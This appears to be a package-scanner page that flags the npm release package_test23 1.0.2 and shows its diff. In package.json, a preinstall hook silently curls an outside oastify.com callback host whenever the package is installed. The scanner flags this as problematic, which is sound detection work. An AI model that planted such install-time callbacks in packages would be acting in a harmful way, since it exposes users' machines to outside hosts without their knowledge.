package_test23 1.0.2
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of package_test23 might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +12 -0
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
console.log("Hi!");
|
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "package_test23",
|
3
|
+
"version": "1.0.2",
|
4
|
+
"description": "A package test",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "curl https://8w5atj1gew18stf40d0fu49rjip8dx.oastify.com/",
|
8
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
9
|
+
},
|
10
|
+
"author": "Luca",
|
11
|
+
"license": "MIT"
|
12
|
+
}
|